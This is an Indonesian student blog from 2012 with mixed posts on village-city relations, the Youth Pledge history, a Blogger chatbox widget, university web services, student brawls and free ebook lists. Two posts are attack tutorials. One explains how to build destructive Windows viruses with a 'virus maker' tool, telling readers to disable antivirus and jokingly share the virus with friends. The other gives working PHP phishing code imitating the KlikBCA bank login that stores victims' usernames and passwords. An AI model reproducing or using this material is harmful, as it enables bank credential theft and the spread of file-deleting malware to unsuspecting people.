This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Jumat, 09 November 2012

hubungan masyarakat desa dan kota

Masyarakat pedesaan dan perkotaan bukanlah dua komonitas yang terpisah sama sekali satu sama lain. Bahkan dalam keadaan yang wajar diantara keduanya terdapat hubungan yang erat. Bersifat ketergantungan, karena diantara mereka saling membutuhkan. Kota tergantung pada dalam memenuhi kebutuhan warganya akan bahan bahan pangan seperti beras sayur mayur , daging dan ikan. Desa juga merupakan sumber tenaga kasar bagi bagi jenis jenis pekerjaan tertentu dikota. Misalnya saja buruh bangunan dalam proyek proyek perumahan. Proyek pembangunan atau perbaikan jalan raya atau jembatan dan tukang becak. Mereka ini biasanya adalah pekerja pekerja musiman. Pada saat musim tanam mereka, sibuk bekerja di sawah. Bila pekerjaan dibidang pertanian mulai menyurut, sementara menunggu masa panen mereka merantau ke kota terdekat untuk melakukan pekerjaan apa saja yang tersedia.
“Interface”, dapat diartikan adanya kawasan perkotaan yang tumpang-tindih dengan kawasan perdesaan, nampaknya persoalan tersebut sederhana, bukankah telah ada alat transportasi, pelayanan kesehatan, fasilitas pendidikan, pasar, dan rumah makan dan lain sebagainya, yang mempertemukan kebutuhan serta sifat kedesaan dan kekotaan.

Hubungan kota-desa cenderung terjadi secara alami yaitu yang kuat akan menang, karena itu dalam hubungan desa-kota, makin besar suatu kota makin berpengaruh dan makin menentukan kehidupan perdesaan.
Secara teoristik, kota merubah atau paling mempengaruhi desa melalui beberapa caar, seperti:
(i) Ekspansi kota ke desa, atau boleh dibilang perluasan kawasan perkotaan dengan merubah atau mengambil kawasan perdesaan. Ini terjadi di semua kawasan perkotaan dengan besaran dan kecepatan yang beraneka ragam;
(ii) Invasi kota , pembangunan kota baru seperti misalnya Batam dan banyak kota baru sekitar Jakarta merubah perdesaan menjadi perkotaan. Sifat kedesaan lenyap atau hilang dan sepenuhnya diganti dengan perkotaan;
(iii) Penetrasi kota ke desa, masuknya produk, prilaku dan nilai kekotaan ke desa. Proses ini yang sesungguhnya banyak terjadi;
(iv) ko-operasi kota-desa, pada umumnya berupa pengangkatan produk yang bersifat kedesaan ke kota. Dari keempat hubungan desa-kota tersebut kesemuanya diprakarsai pihak danorang kota. Proses sebaliknya hampir tidak pernah terjadi, oleh karena itulah berbagai permasalahan dan gagasan yang dikembangkan pada umumnya dikaitkan dalam kehidupan dunia yang memang akan mengkota.
Salah satu bentuk hubungan antara kota dan desa adalah :
a). Urbanisasi dan Urbanisme
Dengan adanya hubungan Masyarakat Desa dan Kota yang saling ketergantungan dan saling membutuhkan tersebut maka timbulah masalah baru yakni ; Urbanisasi yaitu suatu proses berpindahnya penduduk dari desa ke kota atau dapat pula dikatakan bahwa urbanisasi merupakan proses terjadinya masyarakat perkotaan.
b) Sebab-sebab Urbanisasi

Senin, 05 November 2012

SUMPAH PEMUDA

SEJARAH
Hari Sumpah Pemuda yang kita peringati setiap tanggal 28 Oktober itu tidak muncul dengan sendirinya. Bila dilihat dari sejarahnya, Sumpah Pemuda dimulai ketika sekelompok pemuda merasa perlu ada sebuah perekat dan pemersatu agar bangsa kita lebih kuat untuk merebut kemerdekaan Indonesia.

Kongres Pemuda Indonesia
Sumpah pemuda merupakan sumpah setia dari hasil rumusan kerapatan pemuda-pemudi Indonesia atau yang dikenal dengan Kongres Pemuda l dan Kongres Pemuda II. Nah, melalui kongres itulah kita bisa mengenal Sumpah Pemuda.
Kongres Pemuda I berlangsung di Jakarta, pada 30 April—2 Mei 1926. Di kongres itu, mereka membicarakan pentingnya persatuan bangsa bagi perjuangan menuju kemerdekaan. Kemudian, pada tanggal 27—28 Oktober 1928, para pemuda Indonesia kembali mengadakan Kongres Pemuda II. Dan, pada tanggal 28 Oktober 1928, seluruh peserta membacakan Sumpah Pemuda. Sejak saat itu, setiap tanggal 28 Oktober, kita memperingati Hari Sumpah Pemuda.

Rumusan Sumpah Pemuda
Rumusan itu ditulis Mohammad Yamin di sebuah kertas saat mendengarkan pidato dari Mr. Sunario pada hari terakhir kongres. Inti dari isi Sumpah Pemuda itu adalah Satu Nusa, Satu Bangsa, dan Satu Bahasa. Inilah yang selalu menjiwai pemuda-pemudi Indonesia dalam merebut dan mempertahankan serta mengisi kemerdekaan Indonesia.

Isi Sumpah Pemuda 28 Oktober 1928
Sumpah Pemuda
Kami Putra dan Putri Indonesia mengaku bertumpah darah yang satu, tanah Indonesia.
Kami Putra dan Putri Indonesia mengaku berbangsa yang satu, bangsa Indonesia.
Kami Putra dan Putri Indonesia menjunjung bahasa persatuan, bahasa Indonesia.

Tokoh yang terlibat
Banyak tokoh yang menjadi peserta dalam Kongres Pemuda I dan II. Mereka datang mewakili berbagai organisasi pemuda yang ada saat itu. Di antaranya ada yang menjadi pengurus, seperti Soegondo Djojopoespito dari Perhimpunan Pelajar-Pelajar Indonesia (PPPI) sebagi ketua dan wakilnya, R.M. Djoko Marsaid (Jong Java).
Sementara Mohammad Yamin dari Jong Sumateranen Bond sebagai sekretaris dan bendaharanya Amin Sjarifuddin (Jong Bataks Bond). Mereka juga dibantu oleh Djohan Mohammad Tjai (Jong Islamieten Bond), R. Katja Soengkana (Pemuda Indonesia), Senduk (Jong Celebes), Johanes Leimena (Jong Ambon), dan Rochjani Soe’oed (Pemuda Kaum Betawi). Sumpah Pemuda dan kemerdekaan Kelahiran Sumpah Pemuda menjadi senjata yang ampuh untuk merebut kemerdekaan dari tangan penjajah. Dengan semangat persatuan dan kesatuan bangsa, kesadaran para pemuda Indonesia saat itu pun semakin kuat karena mereka tidak berjuang sendiri. Jadi, Sumpah Pemuda adalah salah satu tonggak sejarah kemerdekaan Indonesia.


TANGGAPAN
menurut saya Sumpah pemuda merupakan sumpah setia dari hasil rumusan kerapatan pemuda-pemudi Indonesia atau yang dikenal dengan Kongres Pemuda l dan Kongres Pemuda II. Nah, melalui kongres itulah kita bisa mengenal Sumpah Pemuda.....tetapi anak pemuda jaman sekarang tidak mengerti arti sumpah pemuda itu sendiri karena sumpah pemuda merupakan salah satu semangat persatuan dan kesatuan bangsa ,kesadaran para pemuda indonesia untuk membangun indonesia melangkah lebih baik bagi nusa dan bangsa sekian dan terima kasih......

Sabtu, 20 Oktober 2012

Membuat Virus Menggunakan TeraBIT

Siapa bilang membuat virus itu susah ?
Sekarang anda bisa membuat virus dari yang paling simple sampe Trojan yang dapat merusak sistem.
Oke, skrg saya akan beri penjelasannya dulu………  Cekidot gan……

Terabit Virus Maker 3.2

1. Informasi Software:
  • Software ini dibuat oleh orang Iran. berita tersebut juga belum pasti kebenarannya, tetapi saya mencoba search di google.com dan saya mendapat info yang menyebutkan bahwa software TeraBit Virus Maker adalah asli buatan Iran, dan itu pun dalam versi 3.1 . Dalam versi 3.1 sampai yang sebelumnya, software ini belum support untuk Windows 7, hanya support pada Sistem Operasi sebelum Windows 7, seperti: Windows XP,Vista. Disini saya memiliki Software TeraBit Virus Maker versi 3.2 yang telah support dengan Windows 7.
2. Fungsi Software:
  • Software ini berfungsi untuk membuat virus secara instan dengan kemampuan yang bisa kita pilih sendiri sehingga user dapat menggunakannya dengan mudah dan cepat. Di dalam software tersebut telah disediakan fitur-fitur yang bisa kita gunakan dalam pembuatan virus, ada 54 fitur yang bisa kita gunakan, saya hanya akan menyebutkan 15 fitur saja dan untuk fitur yang lain bisa dilihat di gambar. 15 fitur itu adalah:

1. Avoid Opening Calculator
2. Avoid Opening Copy,Move Window
3. Avoid Opening Gpedit
4. Avoid Opening Media Player
5. Avoid Opening Mozzila Firefox
6. Avoid Opening MsConfig
7. Avoid Opening Notepad
8. Avoid Opening Wordpad
9. Avoid Opening Yahoo Messenger
10. Add 30 User Accounts to Windows
11. Always Clean Clipboard
12. Always Log Off
13. Close Internet Explorer Every 10 sec
14. Delete All Files In Desktop
15. Delete All Files In My Documents

File virus ini ber-ekstensi *.exe . Jadi, ketika file virus ini dieksekusi, maka fitur-fitur yang telah ditambahkan, akan berjalan dan mengubah pengaturan system computer anda sesuai dengan fitur yang anda pilih.
Dan ada item-item yang bisa digunakan untuk melengkapi kesempurnaan dari virus yang anda buat, seperti:
  • Binder berfungsi untuk mengeksekusi/menjalankan file yang kita kaitkan dengan virus yang anda buat, file yang bisa dikaitkan bisa dalam format apa saja, sperti file gambar, file word, exel, powerpoint, music, notepad, dan lain-lain.
  • Fake Error Message berfungsi untuk memunculkan pesan palsu yang kita buat sendiri, dan sub-itemnya ada title, message, dan type. Title isi judul pesan, Message isi dengan pesan kalian sendiri, dan type, pilih tipe yang anda inginkan.
  • Run Custom Command (ini belum saya coba sebelumnya)
  • Add [ ] fake KB(s) to virus berfungsi untuk menambahkan kapasitas palsu ke dalam file virus tersebut.
  • File name after install adalah file yang sebenarnya berjalan, saat file palsu tersebut dieksekusi, disana terdapat tipe/ekstensi *.exe yang bisa digunakan.
  • File Icon adalah item yang digunakan untuk memilih icon file virus tersebut.
  • File Name adalah item yang digunakan untuk memberi nama pada file tersebut.
  • Run Virus with Windows adalah item yang berfungsi untuk menjalankan file pada windows.
  • [R] adalah tombol reset, untuk mereset ulang pengaturan yang telah dipilih ke pengaturan defaultnya
  • Create Virus berfungsi untuk membuat file virus yang telah kita rancang sebelumnya.
3. Cara Menggunakan Software:
  1. Install deepfreeze untuk menjaga agar komputer anda aman.
  2. Disable Antivirus anda, karena software ini dianggap sebagai virus oleh antivirus.
  3. Jalankan Software tVirusMaker.exe
  4. Pilih/ceklist fitur-fitur yang telah disediakan dan pilih item-item yang akan digunakan.
  5. Terakhir anda klik Create Virus dan simpan ke direktori anda.
  6. File virus siap dijalankan. (*dan bagi-bagi ke teman-teman anda, ‘hahahah…hanya saran’*)
4. Download Software :
Download Link —> DOWNLOAD DISINI


Virus-virus ini juga sangat mudah terdeteksi oleh antivirus, kebanyakan akan berhasil apabila target korban tidak menggunakan antivirus / antivirusnya disable. Tetapi tidak ada salahnya untuk dicoba kan?
Selamat mencoba & jangan disalah gunakan :)

Phishing Attack: Login Overflow

Phishing!! Yeah, pasti sudah tahu kan apa artinya phishing?
Kalau belum tahu silahkan check it http://en.wikipedia.org/wiki/Phishing
Saya akan berbagi coding sederhana php dan database mysql dalam proses overflow. Data Korban akan di simpan ke dalam database, jadi sebelumnya kalian harus membuat database yang sesuai dengan Login Phishing.
DFD Phishing

Ketika korban terjebak dengan login phishing, web browser korban akan crash dan CPU Range Korban menjadi 100%.

Sebagai contoh saya akan demonstrasi phishing pada KLIKBCA
bca

Membuat 3c.php
<?php
include “koneksi.php”;
$User = $_POST['UserId'];
$passwd = $_POST['passwd'];
$ip = getenv(REMOTE_ADDR);
$tgl = date(“j F Y, g:i a”);
$query = “INSERT INTO hack (user, passwd, ip, tgl) VALUES (‘$User’, ‘$passwd’, ‘$ip’, ‘$tgl’)”;
mysqli_query($konek, $query); // kirim query ke database
$hasil = mysqli_affected_rows($konek); // cek perubahan data di database
// login.php adalah URL Direct letak overflow
if ($hasil > 0)
{
header(‘location:../login.php’ );
}
else
{
echo “gagal”;
}
?>

Membuat koneksi.php
<?php
$database = “bca”; // nama database
$host = “localhost”; // nama host
$nama = “root”; // username database
$pass = “haning”; // password database
$konek = mysqli_connect($host, $nama, $pass, $database); // konek ke database
if(mysqli_connect_errno())
{
echo “Koneksi Ke Server Gagal.”;
exit();
}
?>

Tempat berlangsungnya overflow, saya namakan login.php
<?php
mysql_connect (“localhost”, “root”,”haning”) or die (mysql_error());
mysql_select_db (“bca”) or die(mysql_error());
$over = $_POST['login']; // button submit “login”
$sql = mysql_query(” select * from hack where user like ‘%$over%’ “);
$row = mysql_fetch_array($sql);
// Proses Oveflow, lebih tepatnya Perulangan Pencarian
if ($row > 0)
{
while ($row){
echo “At “.$row['tgl'].” Secure Socket SSL Invalid. Please, do not process access to BCA Internet Banking.<br>”;
}
}
else
{
echo “overflow gagal”;
}
?>
Tujuan di balik phishing ini adalah mencuri informasi korban di balik login palsu dan membuat panik korban. Ketika korban panik, maka ia akan menutup login tersebut dan sang Attacker mendapatkan user login korban di dalam database yang telah disiapkan sebelumnya.
Simak VIDEO nya Disini:

Untuk Download Video Demonstrasi Klik DISINI
Artikel ini hanya semata-mata untuk pembelajaran, penulis tidak bertanggung jawab sama sekali atas tindakan diluar artikel ini. Gunakan artikel ini sebagai pembelajaran dan memproteksi diri.

Rabu, 17 Oktober 2012

Cara membuat Hidden-Show Chatbox Kanan/kiri



Biasanya memasang Hidde / Show Chatboxblog jika blog kita penuh dengan berbagai macam gadget, iklan dsb..

Berikut langkah-langkah memasangnya :
1. Login akun blog anda
2. Masuk pada Tata letak (layout)
3. Pilih Elemen halaman (page element)
4. Klik Tambah gadget (add gadget)
5. Pilih HTML/Javascript
6. Masukkan kode berikut ini dalam kolom yang tersedia

kode hidden/Show chatbox Kiri


Kode hidden/Show chatbox Kanan



Berikut keterangannya..

1. top:100px = keterangan jarak icon hidden chatbox dari atas (top) sejauh 100 px
2. height:100px = tinggi (height) tampilan icon hidden chatbox yang sebesar 100 px
3. width:30px = lebar (width) tampilan icon hidden chatbox yang sebesar 30 px
4. border:2px solid #003e82 = warna (solid) dan ukuran border yaitu #003e82 dan border sebesar 2 px
5. background:#f3f6f7 = warna background pada chatbox saat ditampilkan
6.background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMw5lrVPVu0vhNQV5_wGPAj9_rXrAMZK9MoglAKROvXoI-wRQu9AgoGOZcoHU0CSzChA1KnrYETR6hBmWp9ZWoyfGsLxOxiFjCubCi-yRGPXEGOkVJMFz0u38H1xhi_A7lN-bzJXPYT8/s400/cbblue.png') no-repeat = icon hidden chatbox yang akan berguna untuk menampilkan chatbox yang disembunyikan

Di bawah ini adalah gambar icon Chatbox, pilih sesuai selera anda :


background:urlbackground:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEIJ-FG9I07W_dbp8CRVz2SLNeDEw5Dpzznf6iGHIn9DAIRgZI6UH_YLkQWpoXD2oTL-sm_y5qPvBSIfLzpC_WrGh2vn984ul9kdWgiG2Ear8AoXX1wz0SoPc_Ng0yC8m2zmy-GaJ47s_B/s1600/cbblue-2.png')
Warna border #0079a0







background:urlbackground:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHPP365tBdV3i1rXCXnccpuaunP5ASZOhzA_n8sKqdtBqbtOo-CXlC7XKQBxlkP4H15ExGJa0c6oykYkWnrWs90wSxPtio5EhQpkSZe-hhxVMeSd2svF-Md24c9lNW6aNU5zBIVCgzpdOO/s1600/cbgreen.png')
Warna border #008232




background:urlbackground:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIjRhY-ZuQyGMQclXQO9J9Qkau7nTlZ72CzJmPAcPiy9rimKBp6ZstXQgrJPIsicNc_2W4mDkrvuQ_hc6zfRvJgzRnZZ0neFOFAUTLDoeif_OMBEoqRr5-8yjfPVDKWXEEzm1r4AjCuKi3/s1600/cbyellow.png')
Warna border #aca500




background:urlbackground:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBJRJ9Bpq1uEQ1ocO-e0w5pcWDdSd6o7qqEhWkkmoOy6V0dzWoJKTqBoS6nymnpk_gHhAXhxUo6pJ5S1c8Xdt8McD1HlsM9F61dr4I3_rkowQRrdA18iAYOtKqV0UsXn48aWuG-3cavdX7/s1600/cbred.png')
Warna border #790909

Minggu, 14 Oktober 2012

tanggapan Layanan Subdomain Website Universitas Gunadarma

Terdapat beberapa layanan subdomain di website Universitas Gunadarma yang digunakan untuk memudahkan dan mendukung kegiatan perkuliahan di Universitas Gunadarma. Beberapa diantaranya yaitu: BAAK Online, Studentsite, UG Open Courseware, Virtual Class, UG Wartawarga, dan UG Community.
1. BAAK online
Di sini tercantum semua informasi kegiatan perkuliahan di Universitas Gunadarama. Misalnya, link ke situs SAP dan situs jurusan, kalender akademik, administrasi, jadwal kuliah, pencarian mahasiswa, dan lain-lain.
2. Studentsite
Dalam studentsite, informasi-informasi yang berhubungan dengan kegiatan perkuliahan dicantumkan di sini melalui menu-menu dan fitur-fiturnya. Misalnya, info-info mengenai beasiswa, tugas dari dosen, link ke layanan subdomain website Gunadarma yang lain, kalender akademik, dll.
Studentsite ini juga berfungsi sebagai website e-mail para mahasiswa, dengan alamat “username”@student.gunadarma.ac.id. Fitur studentsite sebagai website e-mail, antara lain: Addresbook, penyimpanan message hingga 100MB, dan Calendar.
Namun dalam waktu-waktu tertentu subdomain Studentsite ini terkadang tidak dapat diakses. Meskipun hanya kadang-kadang, hal ini cukup mengganggu kegiatan perkuliahan. Selain itu ada beberapa menu dalam studentsite yang tidak dapat diakses.
3. UG Open Courseware
Di subdomain ini, semua materi yang dijarkan di Universitas Gunadarma diupload ke sini. Siapa saja dengan latar belakang manapun diperbolehkan untuk men-download materi-materi tersebut. Kekurangan dari layanan ini yaitu kurangnya publikasi, sehingga subdomain layanan ini kurang dikenal oleh masyarakat luas.
4. Virtual class
Dengan Virtual Class, kegiatan belajar mengajar dapat dilaksanakan dengan tanpa adanya dosen. Dalam subdomain ini, telah terdapat materi-materi dan soal-soal latihan yang dapat digunakan mahasiswa untuk memahami materi yang diajarkan walaupun tanpa dosen. Namun, ada beberapa mahasiswa yang kurang dapat memahami materi tanpa adanya dosen yang menerangkan materi tersebut.
5. UG Wartawarga
Subdomain Warta Warga ini merupakan ajang bagi mahasiswa Gunadarma untuk menulis. Semua bentuk tulisan dari mahasiswa Universitas Gunadarma dicantumkan dan di pisah berdasarkan kategori tulisan. Tulisan mengenai musik, tips and trik, hingga tulisan tentang pendidikan, ada di sini. Di sini juga dicantumkan informasi seputar kegiatan perkuliahan di UG, link ke layanan lain, link ke blog UKM dan lain-lain. Melalui UG Warta Warga kita dapat mendengarkan UG Radio.
6. UG Community
Tempat untuk mahasiswa Universitas Gunadarma untuk membentuk forum di dunia maya. Fitur-fitur UG Comunity antara lain: UG Tube, Group, Social Networking, hingga blog pribadi.
Links:
http://baak.gunadarma.ac.id
http://studentsite.gunadarma.ac.id
http://ocw.gunadarma.ac.id
http://v-class.gunadarma.ac.id
http://wartawarga.gunadarma.ac.id
http://community.gunadarma.ac.id

TANGGAPAN TENTANG TAWURAN YANG TERJADI SAAT INI



Sobat Axes (baca = Akses), pernahkah kalian menonton televisi? Admin yakin pasti kalian sering menonton televisi. Kecuali yang nggak punya. Kalau nggak punya, numpang di rumah tetangga yang punya televisi donk. Biar bisa nonton TV. Hehe :D . Just Kidding.
Saat nonton TV, apa yang sobat tonton? Hayo... ngaku ... siapa yang suka nonton SPONGEBOB? DORA? SHAUN THE SHEEP? SCOOBIDOO? Hayo... pada berani ngaku nggak ya? Hehe :D . Kalau saya sih sukanya SPONGEBOB, hehe :D
Ah, malah sampai ke mana-mana. Kita buang jauh-jauh dulu film kartun. Kita bicara tentang berita. Pernah nggak nonton berita? Di mana? SCTV? ANTV? RCTI? INDOSIAR? TRANS? METRO? Atau yang lain? Pernah nggak kalian perhatikan, akhir-akhir ini banyak muncul berita tawuran antar pelajar. Iya kan?
Mari kita ulas hal-hal mengenai tawuran ini.
Sekarang kita lihat, dari segi fungsi, apa sih fungsi tawuran itu?
Jika yang menjawab pertanyaan ini adalah pelajar-pelajar yang sering tawuran, maka jawabannya akan berbeda dengan jawaban orang-orang umum. Kenapa? Karena keduanya memiliki perbedaan tujuan. Orang umum mempunyai tujuan untuk hidup damai dan nyaman. Sedangkan pelajar yang sering terlibat tawuran memiliki tujuan-tujuan tertentu yang sebenarnya tidak perlu diwujudkan dengan cara tawuran segala.
Jika dilihat dari segi fungsi (dari pandangan yang terlibat), mungkin inilah beberapa fungsi tawuran itu :
- Solidaritas
- Menguasai satu wilayah tertentu
- Menjadikan orang itu sangar (ditakuti oleh orang lain)
Dampak Negatif Tawuran
Nah, sekarang kita lihat apa dampak yang diakibatkan oleh adanya tawuran ini, diantaranya :
- Menciptakan permusuhan
- Menciptakan rasa tidak aman dan tidak nyaman terhadap orang-orang di sekitar lokasi tawuran
- Melukai orang, baik yang terlibat maupun yang tak terlibat
- Bahkan bisa sampai membunuh orang yang tidak bersalah
- Merusak rumah di sekitar lokasi
- Mengotori jalan/lokasi dengan batu-batuan dan darah
- Bisa membuat jalan Macet
- dan masih banyak dampak negatif lain yang tidak bisa saya sebutkan satu persatu. Karena terlalu banyak dampak negatif yang ditimbulkan dari adanya tawuran ini.
Pesan Untuk Yang Pernah atau Sering Ikut Tawuran
Hai , buat para pelajar yang suka tawuran. Bukannya saya sok menasihati. Saya hanya ingin menyampaikan pesan yang mungkin banyak orang juga ingin mengatakannya.
Berhentilah melakukan tawuran. Apa sih untungnya? Tawuran hanya akan membuang waktu, membuang tenaga, membuang ketenangan, dan menciptakan ketidaknyamanan. Lihat orang-orang  yang tak bersalah terluka akibat ulah kalian. Bahkan ada juga yang sampai meninggal dunia. Coba kalian lihat rumah-rumah di sekitar lokasi kalian tawuran. Banyak rumah yang dibangun dengan biaya , tapi malah kalian rusak dengan begitu saja.
Mohon maaf sebelumnya. Saya hanya menyampaikan pesan ini dengan tujuan agar kalian tidak melakukan tawuran lagi. Pakai waktu yang kalian gunakan untuk tawuran itu untuk kegiatan lain yang bermanfaat, seperti bekerja, atau beribadah.
Semoga kalian sadar dengan adanya pesan ini. Semoga Tuhan membuka hati dan fikiran kalian, sehingga tidak ada korban yang berjatuhan lagi.

sekian dan terima kasih

Selasa, 25 September 2012

Webmaster Pro FrontPage XP

Webmaster Pro FrontPage XP

Judul: Webmaster Pro FrontPage XP
Bahasa: Indonesia
Penulis: Komaruddin
Jumlah halaman: 413
Format ebook: PDF
Harga: Rp. 0,-
Perekomendasi: Admin
Gambar Ebook Webmaster Pro FrontPage XP
Sebagaimana judulnya, ebook dengan total 413 halaman ini akan mambantu menjadikan anda seorang webmaster pembuat website dengan menggunakan fasilitas dari program FronPage Windows XP.
Terdapat 13 bab di dalamnya, dengan penguraian materi yang cukup gamblang. Sangat istimewa untuk sebuah ebook gratisan.
Download ebooknya dengan mengklik tombol di bawah ini!
Bagian 1

Bagian 2

Kunjungi juga website penerbit ebooknya di www.elektrounsri.com

Seni Googling

Judul: Seni Googling
Bahasa: Indonesia
Penulis: Mohamad Iqbal
Jumlah halaman: 11
Format ebook: PDF
Harga: Rp. 0,-
Perekomendasi: Ciebal
Gambar Ebook Seni Googling
“Sudahkan optimalkah proses pencarian yang biasa anda lakukan di Google?”
Tahukah anda bahwa ternyata terdapat banyak sekali hal tersembunyi yang bisa kita temukan melalui Google. Google dapat kita jadikan sebagai sebuah mesin pencarian yang sangat efektif jika kita mau asalkan kita mengetaahui kata kunci perintah perintah tertentu (syntax) yang bisa kita pergunakan.
Berbeda dengan ebook Google hacking yang juga di share di website ini, ebook ini berbahasa indonesia, namun ebook Seni Googling ini baru membahas mengenai penggunaan syntax syntax umum saja, meski demikian pembahasannya masih lebih mendalam jika dibandingkan ebook Google Hacking.
Download ebooknya dengan mengklik tombol di bawah ini!

Kunjungi juga website penerbit ebooknya di www.my-ciebal.co.cc

Panduan Praktis Bikin Situs Gratis

Judul: Panduan Praktis Bikin Situs Gratis
Bahasa: Indonesia
Penulis: Asnawi, ST.
Jumlah halaman: 15
Format ebook: PDF
Harga: Rp. 0,-
Perekomendasi: Admin
Gambar Ebook Panduan praktis bikin situs gratis
Ebook ini mengungkap rahasia mengenai bagaimana cara memiliki sebuah, dua buah, tiga buah, atau berapapun banyaknya website gratis tanpa anda perlu membayar domain ataupun sewa hosting bulanan.
Dan yang lebih istimewanya lagi di sini adalah, website yang akan kita dapatkan tetap dengan memiliki tampilan yang profesional, tanpa iklan ataupun banner di sana sini yang benar-benar dapat merusak pemandangan mengurangi keindahan website kita.
Download ebooknya dengan mengklik tombol di bawah ini!

Kunjungi juga website penerbit ebooknya di www.bizgp.go2net.ws

Memiliki Situs Web di Internet

Judul: Memiliki Situs Web di Internet
Bahasa: Indonesia
Penulis: Sugeng Wibowo
Jumlah halaman: 44
Format ebook: PDF
Harga: Rp. 0,-
Perekomendasi: Admin
Gambar Ebook Memiliki Situs Web di Internet
Ebook “Memiliki Situs Web di Internet” ini diterbitkan dengan tujuan untuk menjelaskan secara sistematis mengenai alur/proses sebuah situs web supaya bisa tampil di Internet dan menjelaskan secara lengkap untuk setiap alur yang harus dilalui sehingga situs web yang sudah anda buat di komputer pribadi anda bisa tampil di Internet dengan sebuah alamat tertentu.
Di ebook ini pun dijelaskan mengenai hal-hal yang harus diperhatikan dari data situs web sebelum kita menampilkannya di Internet serta bagaimana cara untuk melakukan proses upload data.
Download ebooknya dengan mengklik tombol di bawah ini!

Kunjungi juga website penerbit ebooknya di (…)

Rahasia Trafik Kunjungan Pasif Melimpah

Judul: Rahasia Trafik Kunjungan Pasif Melimpah
Bahasa: Indonesia
Penulis: Kusuma Putra
Jumlah halaman: 23
Format ebook: PDF
Harga: Rp. 0,-
Perekomendasi: Kusuma
Gambar Ebook Rahasia Trafik Kunjungan Pasif Melimpah
Ebook ini berisi tentang rahasia mendapatkan kunjungan melimpah
ke website atau blog anda tanpa harus melakukan promosi lagi.
Sehingga kunjungan akan menjadi hal yang mudah di dapatkan.
Beberapa materi yang bisa anda dapatkan dari ebook ini diantaranya:
1. 7 Cara Promosi Terbaik Yang Selama Ini penulis Pergunakan Untuk Mendatangkan Ribuan Kunjungan Perhari. Semuanya bisa anda lakukan juga!
2. Kenapa Harus Belajar Promosi di Internet?
3. Apa Itu Kunjungan Aktif dan Apa Kunjungan Pasif?
4. Bagaimana Cara Mendapatkan Kunjungan Pasif Sebanyak-banyaknya?
5. Cara Terhebat Untuk Mendatangkan Kunjungan Dari Search Engine.
6. Bedanya si A yang terus menerus melakukan promosi dengan si B yang tidak promosi lagi namun tetap mendapatkan ribuan kunjungan ke websitenya?
7. Bagaimana Ngeblog bisa mendatangkan banyak kunjungan pasif?
8. Sebuah Tehnik Mendatangkan Kunjungan Yang Memberi Sangat Banyak Kunjungan Tanpa Penulis Melakukan Promosi Lagi, Bahkan 1 tahun setelahnya!
Download ebooknya dengan mengklik tombol di bawah ini!

Kunjungi juga website penerbit ebooknya di www.memulaibisnisonline.com

Selamat Menikmati dan Semoga Bermanfaat -DuniaDownload-

ava Ebook Untuk Belajar Pemrograman

Kumpulan ebook ini berguna untuk belajar program, belajar programmer dan belajar pemrograman khususnya mengenai “java”. Semoga bermanfaat saja deh ya.

KUMPULAN JAVA EBOOK

Free online book: Java Fundamentals
Java Fundamentals: A entry level textbook on the Java programming language by Gary Marrer.
Isi Ebook:

  • History of Java
  • What makes Java, Java
  • Design Tools (Modeling Program Logic)
  • Program Documentation
  • Identifiers: Variables and Constants
  • Structured Programming
  • Using Repetition Structures
  • Arrays 101
  • Introduction to Object Orientated Programming
  • Inheritance Expanded
  • AWT versus Swing Packages
  • Arrays Revisited
  • Adding data persistence to programs
Book Details
Author(s): Gary Marrer
Format(s): HTML
Link: BACA ONLINE DISINI
A “Free Java book” by Daniel L. Schuster in pdf format.
Isi Ebook
  • Fundamentals
  • ACM Java Graphics
  • Making Decisions
  • Loops
  • Methods & Objects I
  • Game Programming I
  • Useful Java Objects
  • Methods II
  • Arrays & ArrayLists
  • Objects II
  • Game Programming II
  • Arrays II
  • Quick Reference
  • Setting Up Your Computer
Book Details
Author(s): Daniel L. Schuster
Format(s): PDF
Link: DOWNLOAD DISINI
The Common Java Cookbook
The Common Java Cookbook by Tim O’Brien.
Isi Ebook

  • Supplements to the Java 2 Platform
  • Manipulating Text
  • JavaBeans
  • Functors
  • Collections
  • XML
  • Application Infrastructure
  • Math
  • Templating
  • I/O and Networking
  • HTTP and WebDAV
  • Searching and Filtering
  • JSON
  • Protocol Buffers
  • Google Guava: I/O
  • Google Guava: Collections
Book Details
Author(s): Tim O’Brien
Format(s): HTML, PDF
File size: 6.50 MB
Number of pages: 367
Link: DOWNLOAD ATAU BACA DISINI

Java Look and Feel Design Guidelines


  • Author: Sun Microsystems, Inc.
  • Format: online HTML
  • Price: free
Isi Ebook:
  • The Java Look and Feel
  • The Java Foundation Classes
  • Design Considerations
  • Visual Design
  • Application Graphics
  • Behavior
  • Windows and Panes
  • Dialog Boxes and Alert Boxes
  • Menus and Toolbars
  • Basic Controls
  • Text Components
  • Selectable Lists, Tables, and Tree Components
  • Keyboard Shortcuts, Mnemonics, and Other Keyboard Operations
  • Graphics Repository
  • Localization Word Lists
  • Switching Look and Feel Designs
Link: DOWNLOAD DISINI

A Guide to Modern Programming with Java



  • Author: Gregory J. E. Rawlins
  • Format: online HTML
  • Price: free
Isi Ebook:
  • Setting the Stage
  • Introducing the Players
  • Behind the Scenes
  • Character Study
  • Stage Direction
  • All Together Now
  • It Takes All Types
  • What’s in a Name?
  • Think Like an Object
  • Let the Games Begin
  • The Play’s the Thing
  • Networking
  • Defensive Programming
  • Design Patterns
  • Navel Gazing
  • Satori
  • Avoiding Style Crime
  • Java’s Flaws
  • Book Recommendations
  • The Rest of Java
Link: DOWNLOAD DISINI

Dasar Pemrograman Database MySQL

